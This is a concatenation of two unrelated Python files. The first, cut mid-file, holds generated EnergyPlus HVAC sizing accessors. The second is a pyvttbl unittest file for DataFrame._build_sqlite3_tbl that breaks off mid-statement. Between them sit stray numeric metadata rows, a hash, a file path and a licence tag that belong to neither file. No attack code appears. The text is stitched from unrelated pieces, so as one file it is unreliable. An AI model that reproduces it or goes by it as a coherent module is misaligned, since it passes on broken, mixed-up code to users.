def central_heating_design_supply_air_humidity_ratio(self):
"""field `Central Heating Design Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
| Default value: 0.008
Args:
value (float): value for IDD Field `Central Heating Design Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_heating_design_supply_air_humidity_ratio` or None if not set
"""
return self["Central Heating Design Supply Air Humidity Ratio"]
@central_heating_design_supply_air_humidity_ratio.setter
def central_heating_design_supply_air_humidity_ratio(self, value=0.008):
"""Corresponds to IDD field `Central Heating Design Supply Air Humidity
Ratio`"""
self["Central Heating Design Supply Air Humidity Ratio"] = value
@property
def cooling_supply_air_flow_rate_method(self):
"""field `Cooling Supply Air Flow Rate Method`
| Default value: DesignDay
Args:
value (str): value for IDD Field `Cooling Supply Air Flow Rate Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_supply_air_flow_rate_method` or None if not set
"""
return self["Cooling Supply Air Flow Rate Method"]
@cooling_supply_air_flow_rate_method.setter
def cooling_supply_air_flow_rate_method(self, value="DesignDay"):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Method`"""
self["Cooling Supply Air Flow Rate Method"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
| This input is used if Cooling Supply Air Flow Rate Method is Flow/System
| This value will *not* be multiplied by any sizing factor or by zone multipliers.
| If using zone multipliers, this value must be large enough to serve the multiplied zones.
| Units: m3/s
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_floor_area(self):
"""field `Cooling Supply Air Flow Rate Per Floor Area`
| Enter the cooling supply air volume flow rate per total conditioned floor area.
| Required field when Cooling Supply Air Flow Rate Method is FlowPerFloorArea.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate_per_floor_area` or None if not set
"""
return self["Cooling Supply Air Flow Rate Per Floor Area"]
@cooling_supply_air_flow_rate_per_floor_area.setter
def cooling_supply_air_flow_rate_per_floor_area(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Per Floor
Area`"""
self["Cooling Supply Air Flow Rate Per Floor Area"] = value
@property
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(self):
"""field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the cooling supply air flow rate.
| Required field when Cooling Supply Air Flow Rate Method is
| FractionOfAutosizedCoolingAirflow.
Args:
value (float): value for IDD Field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_fraction_of_autosized_cooling_supply_air_flow_rate` or None if not set
"""
return self[
"Cooling Fraction of Autosized Cooling Supply Air Flow Rate"]
@cooling_fraction_of_autosized_cooling_supply_air_flow_rate.setter
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(
self,
value=None):
"""Corresponds to IDD field `Cooling Fraction of Autosized Cooling
Supply Air Flow Rate`"""
self[
"Cooling Fraction of Autosized Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(self):
"""field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity`
| Enter the supply air volume flow rate per unit cooling capacity.
| Required field when Cooling Supply Air Flow Rate Method is
| FlowPerCoolingCapacity.
| Units: m3/s-W
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate_per_unit_cooling_capacity` or None if not set
"""
return self["Cooling Supply Air Flow Rate Per Unit Cooling Capacity"]
@cooling_supply_air_flow_rate_per_unit_cooling_capacity.setter
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(
self,
value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Per Unit
Cooling Capacity`"""
self["Cooling Supply Air Flow Rate Per Unit Cooling Capacity"] = value
@property
def heating_supply_air_flow_rate_method(self):
"""field `Heating Supply Air Flow Rate Method`
| Default value: DesignDay
Args:
value (str): value for IDD Field `Heating Supply Air Flow Rate Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_supply_air_flow_rate_method` or None if not set
"""
return self["Heating Supply Air Flow Rate Method"]
@heating_supply_air_flow_rate_method.setter
def heating_supply_air_flow_rate_method(self, value="DesignDay"):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Method`"""
self["Heating Supply Air Flow Rate Method"] = value
@property
def heating_supply_air_flow_rate(self):
"""field `Heating Supply Air Flow Rate`
| Required field when Heating Supply Air Flow Rate Method is Flow/System
| This value will *not* be multiplied by any sizing factor or by zone multipliers.
| If using zone multipliers, this value must be large enough to serve the multiplied zones.
| Units: m3/s
Args:
value (float): value for IDD Field `Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Supply Air Flow Rate"]
@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate`"""
self["Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_per_floor_area(self):
"""field `Heating Supply Air Flow Rate Per Floor Area`
| Enter the heating supply air volume flow rate per total conditioned floor area.
| Required field when Heating Supply Air Flow Rate Method is FlowPerFloorArea.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Heating Supply Air Flow Rate Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_supply_air_flow_rate_per_floor_area` or None if not set
"""
return self["Heating Supply Air Flow Rate Per Floor Area"]
@heating_supply_air_flow_rate_per_floor_area.setter
def heating_supply_air_flow_rate_per_floor_area(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Per Floor
Area`"""
self["Heating Supply Air Flow Rate Per Floor Area"] = value
@property
def heating_fraction_of_autosized_heating_supply_air_flow_rate(self):
"""field `Heating Fraction of Autosized Heating Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the heating supply air flow rate.
| Required field when Heating Supply Air Flow Rate Method is
| FractionOfAutosizedHeatingAirflow.
Args:
value (float): value for IDD Field `Heating Fraction of Autosized Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_fraction_of_autosized_heating_supply_air_flow_rate` or None if not set
"""
return self[
"Heating Fraction of Autosized Heating Supply Air Flow Rate"]
@heating_fraction_of_autosized_heating_supply_air_flow_rate.setter
def heating_fraction_of_autosized_heating_supply_air_flow_rate(
self,
value=None):
"""Corresponds to IDD field `Heating Fraction of Autosized Heating
Supply Air Flow Rate`"""
self[
"Heating Fraction of Autosized Heating Supply Air Flow Rate"] = value
@property
def heating_fraction_of_autosized_cooling_supply_air_flow_rate(self):
"""field `Heating Fraction of Autosized Cooling Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the cooling supply air flow rate.
| Required field when Heating Supply Air Flow Rate Method is
| FractionOfAutosizedCoolingAirflow.
Args:
value (float): value for IDD Field `Heating Fraction of Autosized Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_fraction_of_autosized_cooling_supply_air_flow_rate` or None if not set
"""
return self[
"Heating Fraction of Autosized Cooling Supply Air Flow Rate"]
@heating_fraction_of_autosized_cooling_supply_air_flow_rate.setter
def heating_fraction_of_autosized_cooling_supply_air_flow_rate(
self,
value=None):
"""Corresponds to IDD field `Heating Fraction of Autosized Cooling
Supply Air Flow Rate`"""
self[
"Heating Fraction of Autosized Cooling Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_per_unit_heating_capacity(self):
"""field `Heating Supply Air Flow Rate Per Unit Heating Capacity`
| Enter the heating supply air volume flow rate per unit heating capacity.
| Required field when Heating Supply Air Flow Rate Method is
| FlowPerHeatingCapacity.
| Units: m3/s-W
Args:
value (float): value for IDD Field `Heating Supply Air Flow Rate Per Unit Heating Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_supply_air_flow_rate_per_unit_heating_capacity` or None if not set
"""
return self["Heating Supply Air Flow Rate Per Unit Heating Capacity"]
@heating_supply_air_flow_rate_per_unit_heating_capacity.setter
def heating_supply_air_flow_rate_per_unit_heating_capacity(
self,
value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Per Unit
Heating Capacity`"""
self["Heating Supply Air Flow Rate Per Unit Heating Capacity"] = value
@property
def system_outdoor_air_method(self):
"""field `System Outdoor Air Method`
| Default value: ZoneSum
Args:
value (str): value for IDD Field `System Outdoor Air Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `system_outdoor_air_method` or None if not set
"""
return self["System Outdoor Air Method"]
@system_outdoor_air_method.setter
def system_outdoor_air_method(self, value="ZoneSum"):
"""Corresponds to IDD field `System Outdoor Air Method`"""
self["System Outdoor Air Method"] = value
@property
def zone_maximum_outdoor_air_fraction(self):
"""field `Zone Maximum Outdoor Air Fraction`
| Units: dimensionless
| Default value: 1.0
Args:
value (float): value for IDD Field `Zone Maximum Outdoor Air Fraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `zone_maximum_outdoor_air_fraction` or None if not set
"""
return self["Zone Maximum Outdoor Air Fraction"]
@zone_maximum_outdoor_air_fraction.setter
def zone_maximum_outdoor_air_fraction(self, value=1.0):
"""Corresponds to IDD field `Zone Maximum Outdoor Air Fraction`"""
self["Zone Maximum Outdoor Air Fraction"] = value
@property
def cooling_design_capacity_method(self):
"""field `Cooling Design Capacity Method`
| Enter the method used to determine the system cooling design capacity for scalable sizing.
| None is used when a cooling coils is not included in an airloop or this field may be blank.
| If this input field is left blank, then the design cooling capacity is set to zero.
| CoolingDesignCapacity => selected when the design cooling capacity value is specified or
| auto-sized. CapacityPerFloorArea => selected when the design cooling capacity is determined
| from user specified cooling capacity per floor area and total floor area of cooled zones
| served by an airloop. FractionOfAutosizedCoolingCapacity => is selected when the design
| cooling capacity is determined from a user specified fraction and the auto-sized design
| cooling capacity of the system.
| Default value: CoolingDesignCapacity
Args:
value (str): value for IDD Field `Cooling Design Capacity Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_design_capacity_method` or None if not set
"""
return self["Cooling Design Capacity Method"]
@cooling_design_capacity_method.setter
def cooling_design_capacity_method(self, value="CoolingDesignCapacity"):
"""Corresponds to IDD field `Cooling Design Capacity Method`"""
self["Cooling Design Capacity Method"] = value
@property
def cooling_design_capacity(self):
"""field `Cooling Design Capacity`
| Enter the design cooling capacity.
| Units: W
| Default value: "autosize"
Args:
value (float or "Autosize"): value for IDD Field `Cooling Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_design_capacity` or None if not set
"""
return self["Cooling Design Capacity"]
@cooling_design_capacity.setter
def cooling_design_capacity(self, value="autosize"):
"""Corresponds to IDD field `Cooling Design Capacity`"""
self["Cooling Design Capacity"] = value
@property
def cooling_design_capacity_per_floor_area(self):
"""field `Cooling Design Capacity Per Floor Area`
| Enter the cooling design capacity per total floor area of cooled zones served by an airloop.
| Required field when the cooling design capacity method field is CapacityPerFloorArea.
| Units: W/m2
Args:
value (float): value for IDD Field `Cooling Design Capacity Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_design_capacity_per_floor_area` or None if not set
"""
return self["Cooling Design Capacity Per Floor Area"]
@cooling_design_capacity_per_floor_area.setter
def cooling_design_capacity_per_floor_area(self, value=None):
"""Corresponds to IDD field `Cooling Design Capacity Per Floor Area`"""
self["Cooling Design Capacity Per Floor Area"] = value
@property
def fraction_of_autosized_cooling_design_capacity(self):
"""field `Fraction of Autosized Cooling Design Capacity`
| Enter the fraction of auto-sized cooling design capacity. Required field when the cooling
| design capacity method field is FractionOfAutosizedCoolingCapacity.
Args:
value (float): value for IDD Field `Fraction of Autosized Cooling Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_autosized_cooling_design_capacity` or None if not set
"""
return self["Fraction of Autosized Cooling Design Capacity"]
@fraction_of_autosized_cooling_design_capacity.setter
def fraction_of_autosized_cooling_design_capacity(self, value=None):
"""Corresponds to IDD field `Fraction of Autosized Cooling Design
Capacity`"""
self["Fraction of Autosized Cooling Design Capacity"] = value
@property
def heating_design_capacity_method(self):
"""field `Heating Design Capacity Method`
| Enter the method used to determine the heating design capacity for scalable sizing.
| None is used when a heating coil not included in an airloop or this field may be blank.
| If this input field is left blank, then the design heating capacity is set to zero.
| HeatingDesignCapacity => selected when the design heating capacity value is specified or
| auto-sized. CapacityPerFloorArea => selected when the design heating capacity is determined
| from user specified heating capacity per flow area and total floor area of heated zones
| served by an airloop. FractionOfAutosizedHeatingCapacity => is selected when the design
| heating capacity is determined from a user specified fraction and the auto-sized design
| heating capacity of the system.
| Default value: HeatingDesignCapacity
Args:
value (str): value for IDD Field `Heating Design Capacity Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_design_capacity_method` or None if not set
"""
return self["Heating Design Capacity Method"]
@heating_design_capacity_method.setter
def heating_design_capacity_method(self, value="HeatingDesignCapacity"):
"""Corresponds to IDD field `Heating Design Capacity Method`"""
self["Heating Design Capacity Method"] = value
@property
def heating_design_capacity(self):
"""field `Heating Design Capacity`
| Enter the design heating capacity.
| Units: W
| Default value: "autosize"
Args:
value (float or "Autosize"): value for IDD Field `Heating Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_design_capacity` or None if not set
"""
return self["Heating Design Capacity"]
@heating_design_capacity.setter
def heating_design_capacity(self, value="autosize"):
"""Corresponds to IDD field `Heating Design Capacity`"""
self["Heating Design Capacity"] = value
@property
def heating_design_capacity_per_floor_area(self):
"""field `Heating Design Capacity Per Floor Area`
| Enter the heating design capacity per zone floor area. Required field when the heating design
| capacity method field is CapacityPerFloorArea.
| Units: W/m2
Args:
value (float): value for IDD Field `Heating Design Capacity Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_design_capacity_per_floor_area` or None if not set
"""
return self["Heating Design Capacity Per Floor Area"]
@heating_design_capacity_per_floor_area.setter
def heating_design_capacity_per_floor_area(self, value=None):
"""Corresponds to IDD field `Heating Design Capacity Per Floor Area`"""
self["Heating Design Capacity Per Floor Area"] = value
@property
def fraction_of_autosized_heating_design_capacity(self):
"""field `Fraction of Autosized Heating Design Capacity`
| Enter the fraction of auto-sized heating design capacity. Required field when capacity the
| heating design capacity method field is FractionOfAutosizedHeatingCapacity.
Args:
value (float): value for IDD Field `Fraction of Autosized Heating Design Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `fraction_of_autosized_heating_design_capacity` or None if not set
"""
return self["Fraction of Autosized Heating Design Capacity"]
@fraction_of_autosized_heating_design_capacity.setter
def fraction_of_autosized_heating_design_capacity(self, value=None):
"""Corresponds to IDD field `Fraction of Autosized Heating Design
Capacity`"""
self["Fraction of Autosized Heating Design Capacity"] = value
@property
def central_cooling_capacity_control_method(self):
"""field `Central Cooling Capacity Control Method`
| Method used to control the coil's output
| Default value: OnOff
Args:
value (str): value for IDD Field `Central Cooling Capacity Control Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `central_cooling_capacity_control_method` or None if not set
"""
return self["Central Cooling Capacity Control Method"]
@central_cooling_capacity_control_method.setter
def central_cooling_capacity_control_method(self, value="OnOff"):
"""Corresponds to IDD field `Central Cooling Capacity Control
Method`"""
self["Central Cooling Capacity Control Method"] = value
class SizingPlant(DataObject):
""" Corresponds to IDD object `Sizing:Plant`
Specifies the input needed to autosize plant loop flow rates and equipment capacities.
This information is initially used by components that use water for heating or cooling
such as hot or chilled water coils to calculate their maximum water flow rates. These
flow rates are then summed for use in calculating the Plant Loop flow rates.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'plant or condenser loop name',
{'name': u'Plant or Condenser Loop Name',
'pyname': u'plant_or_condenser_loop_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'loop type',
{'name': u'Loop Type',
'pyname': u'loop_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Heating',
u'Cooling',
u'Condenser',
u'Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'design loop exit temperature',
{'name': u'Design Loop Exit Temperature',
'pyname': u'design_loop_exit_temperature',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'loop design temperature difference',
{'name': u'Loop Design Temperature Difference',
'pyname': u'loop_design_temperature_difference',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'deltaC'}),
(u'sizing option',
{'name': u'Sizing Option',
'pyname': u'sizing_option',
'default': u'NonCoincident',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Coincident',
u'NonCoincident'],
'autocalculatable': False,
'type': 'alpha'}),
(u'zone timesteps in averaging window',
{'name': u'Zone Timesteps in Averaging Window',
'pyname': u'zone_timesteps_in_averaging_window',
'default': 1,
'required-field': False,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'coincident sizing factor mode',
{'name': u'Coincident Sizing Factor Mode',
'pyname': u'coincident_sizing_factor_mode',
'required-field': False,
'autosizable': False,
'accepted-values': [u'None',
u'GlobalHeatingSizingFactor',
u'GlobalCoolingSizingFactor',
u'LoopComponentSizingFactor'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 4,
'name': u'Sizing:Plant',
'pyname': u'SizingPlant',
'required-object': False,
'unique-object': False}
@property
def plant_or_condenser_loop_name(self):
"""field `Plant or Condenser Loop Name`
| Enter the name of a PlantLoop or a CondenserLoop object
Args:
value (str): value for IDD Field `Plant or Condenser Loop Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `plant_or_condenser_loop_name` or None if not set
"""
return self["Plant or Condenser Loop Name"]
@plant_or_condenser_loop_name.setter
def plant_or_condenser_loop_name(self, value=None):
"""Corresponds to IDD field `Plant or Condenser Loop Name`"""
self["Plant or Condenser Loop Name"] = value
@property
def loop_type(self):
"""field `Loop Type`
Args:
value (str): value for IDD Field `Loop Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `loop_type` or None if not set
"""
return self["Loop Type"]
@loop_type.setter
def loop_type(self, value=None):
"""Corresponds to IDD field `Loop Type`"""
self["Loop Type"] = value
@property
def design_loop_exit_temperature(self):
"""field `Design Loop Exit Temperature`
| Units: C
Args:
value (float): value for IDD Field `Design Loop Exit Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `design_loop_exit_temperature` or None if not set
"""
return self["Design Loop Exit Temperature"]
@design_loop_exit_temperature.setter
def design_loop_exit_temperature(self, value=None):
"""Corresponds to IDD field `Design Loop Exit Temperature`"""
self["Design Loop Exit Temperature"] = value
@property
def loop_design_temperature_difference(self):
"""field `Loop Design Temperature Difference`
| Units: deltaC
Args:
value (float): value for IDD Field `Loop Design Temperature Difference`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `loop_design_temperature_difference` or None if not set
"""
return self["Loop Design Temperature Difference"]
@loop_design_temperature_difference.setter
def loop_design_temperature_difference(self, value=None):
"""Corresponds to IDD field `Loop Design Temperature Difference`"""
self["Loop Design Temperature Difference"] = value
@property
def sizing_option(self):
"""field `Sizing Option`
| if Coincident is chosen, then sizing is based on HVAC Sizing Simulations and
| the input field called Do HVAC Sizing Simulation for Sizing Periods in SimulationControl must be set to Yes
| Default value: NonCoincident
Args:
value (str): value for IDD Field `Sizing Option`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `sizing_option` or None if not set
"""
return self["Sizing Option"]
@sizing_option.setter
def sizing_option(self, value="NonCoincident"):
"""Corresponds to IDD field `Sizing Option`"""
self["Sizing Option"] = value
@property
def zone_timesteps_in_averaging_window(self):
"""field `Zone Timesteps in Averaging Window`
| this is used in the coincident sizing algorithm to apply a running average to peak flow rates
| that occur during HVAC Sizing Simulations
| Default value: 1
| value >= 1
Args:
value (int): value for IDD Field `Zone Timesteps in Averaging Window`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `zone_timesteps_in_averaging_window` or None if not set
"""
return self["Zone Timesteps in Averaging Window"]
@zone_timesteps_in_averaging_window.setter
def zone_timesteps_in_averaging_window(self, value=1):
"""Corresponds to IDD field `Zone Timesteps in Averaging Window`"""
self["Zone Timesteps in Averaging Window"] = value
@property
def coincident_sizing_factor_mode(self):
"""field `Coincident Sizing Factor Mode`
| this is used to adjust the result for coincident sizing by applying a sizing factor
Args:
value (str): value for IDD Field `Coincident Sizing Factor Mode`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `coincident_sizing_factor_mode` or None if not set
"""
return self["Coincident Sizing Factor Mode"]
@coincident_sizing_factor_mode.setter
def coincident_sizing_factor_mode(self, value=None):
"""Corresponds to IDD field `Coincident Sizing Factor Mode`"""
self["Coincident Sizing Factor Mode"] = value
class OutputControlSizingStyle(DataObject):
""" Corresponds to IDD object `OutputControl:Sizing:Style`
Default style for the Sizing output files is comma -- this works well for
importing into spreadsheet programs such as Excel(tm) but not so well for word
processing programs -- there tab may be a better choice. Fixed puts spaces between
the "columns"
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'column separator',
{'name': u'Column Separator',
'pyname': u'column_separator',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Comma',
u'Tab',
u'Fixed'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'HVAC Design Objects',
'min-fields': 0,
'name': u'OutputControl:Sizing:Style',
'pyname': u'OutputControlSizingStyle',
'required-object': False,
'unique-object': True}
@property
def column_separator(self):
"""field `Column Separator`
Args:
value (str): value for IDD Field `Column Separator`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `column_separator` or None if not set
"""
return self["Column Separator"]
@column_separator.setter
def column_separator(self, value=None):
"""Corresponds to IDD field `Column Separator`"""
self["Column Separator"] = value
| 45.427794
| 125
| 0.520864
| 18,211
| 183,710
| 5.112569
| 0.021635
| 0.04278
| 0.046786
| 0.062993
| 0.931121
| 0.897632
| 0.84496
| 0.799109
| 0.732635
| 0.676516
| 0
| 0.004421
| 0.410201
| 183,710
| 4,043
| 126
| 45.43903
| 0.854862
| 0.322753
| 0
| 0.620406
| 0
| 0
| 0.275822
| 0.043666
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121777
| false
| 0.000549
| 0.001646
| 0
| 0.193088
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c51f7cc15e77423296f866aafcaedc5fc5aa7c83
| 6,957
|
py
|
Python
|
pyvttbl/tests/test_df_build_sqlite3_tbl.py
|
yk/pyvttbl
|
af66c1aba410ba5386249cd5b95f2ae0ed01d870
|
[
"BSD-3-Clause"
] | null | null | null |
pyvttbl/tests/test_df_build_sqlite3_tbl.py
|
yk/pyvttbl
|
af66c1aba410ba5386249cd5b95f2ae0ed01d870
|
[
"BSD-3-Clause"
] | null | null | null |
pyvttbl/tests/test_df_build_sqlite3_tbl.py
|
yk/pyvttbl
|
af66c1aba410ba5386249cd5b95f2ae0ed01d870
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2011, Roger Lew [see LICENSE.txt]
# This software is funded in part by NIH Grant P20 RR016454.
# Python 2 to 3 workarounds
import sys
if sys.version_info[0] == 2:
_strobj = str
_xrange = xrange
elif sys.version_info[0] == 3:
_strobj = str
_xrange = range
import unittest
import warnings
import os
from random import shuffle
import numpy as np
from pyvttbl import DataFrame
from pyvttbl.misc.support import *
class Test__build_sqlite3_tbl(unittest.TestCase):
def test00(self):
"""test with string keys"""
df=DataFrame()
## df.PRINTQUERIES=True
df['1']=list(range(100))
df['2']=['bob' for i in range(100)]
df['3']=[i*1.234232 for i in range(100)]
df['4']=['bob' for i in range(50)]+list(range(50))
df['5']= np.sqrt(df['3'] *100.)
## print(df)
shuffle(df['1'])
shuffle(df['2'])
shuffle(df['3'])
df._build_sqlite3_tbl(list(df.keys()))
df._execute('select * from TBL')
for i,(a,b,c,d,e) in enumerate(df.cur):
self.assertEqual(a,df['1'][i])
self.assertEqual(b,df['2'][i])
self.assertEqual(c,df['3'][i])
self.assertEqual(d,str(df['4'][i]))
def test01(self):
"""test with integer keys"""
df=DataFrame()
df[1]=list(range(100))
df[2]=['bob' for i in range(100)]
df[3]=[i*1.234232 for i in range(100)]
df[4]=['bob' for i in range(50)]+list(range(50))
shuffle(df[1])
shuffle(df[2])
shuffle(df[3])
shuffle(df[4])
df._build_sqlite3_tbl(list(df.keys()))
df._execute('select * from TBL')
for i,(a,b,c,d) in enumerate(df.cur):
self.assertEqual(a,df[1][i])
self.assertEqual(b,df[2][i])
self.assertEqual(c,df[3][i])
self.assertEqual(d,str(df[4][i]))
def test02(self):
"""test with tuple keys"""
df=DataFrame()
## df.PRINTQUERIES = True
df[(1,)]=list(range(100))
df[(2,)]=['bob' for i in range(100)]
df[(3,)]=[i*1.234232 for i in range(100)]
df[(4,)]=['bob' for i in range(50)]+list(range(50))
shuffle(df[(1,)])
shuffle(df[(2,)])
shuffle(df[(3,)])
shuffle(df[(4,)])
df._build_sqlite3_tbl(list(df.keys()))
df._execute('select * from TBL')
for i,(a,b,c,d) in enumerate(df.cur):
self.assertEqual(a,df[(1,)][i])
self.assertEqual(b,df[(2,)][i])
self.assertEqual(c,df[(3,)][i])
self.assertEqual(d,str(df[(4,)][i]))
def test1(self):
"""test with integer keys subset of table"""
df=DataFrame()
df[1]=list(range(100))
df[2]=['bob' for i in range(100)]
df[3]=[i*1.234232 for i in range(100)]
df[4]=['bob' for i in range(50)]+list(range(50))
shuffle(df[1])
shuffle(df[2])
shuffle(df[3])
shuffle(df[4])
df._build_sqlite3_tbl(list(df.keys())[:2])
df._execute('select * from TBL')
for i,(a,b) in enumerate(df.cur):
self.assertEqual(a,df[1][i])
self.assertEqual(b,df[2][i])
def test2(self):
"""test with string keys and tuple where condition"""
df=DataFrame()
df['1']=list(range(100))
df['2']=['bob' for i in range(100)]
df['3']=[i*1.234232 for i in range(100)]
df['4']=['bob' for i in range(50)]+list(range(50))
shuffle(df['1'])
shuffle(df['2'])
shuffle(df['3'])
df._build_sqlite3_tbl(list(df.keys())[:2], [('4','not in',['bob'])])
df._execute('select * from TBL')
for i,(a,b) in enumerate(df.cur):
self.assertEqual(a,df['1'][i+50])
self.assertEqual(b,df['2'][i+50])
def test21(self):
"""test with string keys and tuple where condition"""
df=DataFrame()
df[1]=list(range(100))
df[2]=['bob' for i in range(100)]
df[3]=[i*1.234232 for i in range(100)]
df[4]=['bob' for i in range(50)]+list(range(50))
shuffle(df[1])
shuffle(df[2])
shuffle(df[3])
df._build_sqlite3_tbl(list(df.keys())[:2], [(4,'not in',['bob'])])
df._execute('select * from TBL')
for i,(a,b) in enumerate(df.cur):
self.assertEqual(a,df[1][i+50])
self.assertEqual(b,df[2][i+50])
def test22(self):
"""test with string keys and where condition"""
df=DataFrame()
df['1']=list(range(100))
df['2']=['bob' for i in range(100)]
df['3']=[i*1.234232 for i in range(100)]
df['4']=['bob' for i in range(50)]+list(range(50))
shuffle(df['1'])
shuffle(df['2'])
shuffle(df['3'])
df._build_sqlite3_tbl(list(df.keys())[:2], ['4 not in ("bob")'])
df._execute('select * from TBL')
for i,(a,b) in enumerate(df.cur):
self.assertEqual(a,df['1'][i+50])
self.assertEqual(b,df['2'][i+50])
def test3(self):
"""test with string keys and tuple where condition"""
df=DataFrame()
df[1]=list(range(100))
df[2]=['bob' for i in range(100)]
df[3]=[i*1.234232 for i in range(100)]
df[4]=['bob' for i in range(50)]+list(range(50))
shuffle(df[1])
shuffle(df[2])
shuffle(df[3])
df._build_sqlite3_tbl(list(df.keys())[:2], [(4,'!=','bob')])
df._execute('select * from TBL')
for i,(a,b) in enumerate(df.cur):
self.assertEqual(a,df[1][i+50])
self.assertEqual(b,df[2][i+50])
def test31(self):
df=DataFrame()
df[1]=list(range(100))
df[2]=['bob' for i in range(100)]
df[3]=[i*1.234232 for i in range(100)]
df[4]=['bob' for i in range(50)]+list(range(50))
shuffle(df[1])
shuffle(df[2])
shuffle(df[3])
with self.assertRaises(KeyError) as cm:
df._build_sqlite3_tbl(list(df.keys())[:2], ['4 != "bob"'])
self.assertEqual(str(cm.exception),
"'4'")
def test4(self):
df=DataFrame()
df[1]=list(range(100))
df[2]=['bob' for i in range(100)]
df[3]=[i*1.234232 for i in range(100)]
df[4]=['bob' for i in range(50)]+list(range(50))
with self.assertRaises(TypeError) as cm:
df._build_sqlite3_tbl(list(df.keys())[:2], 42)
self.assertEqual(str(cm.exception),
"'int' object is not iterable")
def suite():
return unittest.TestSuite((
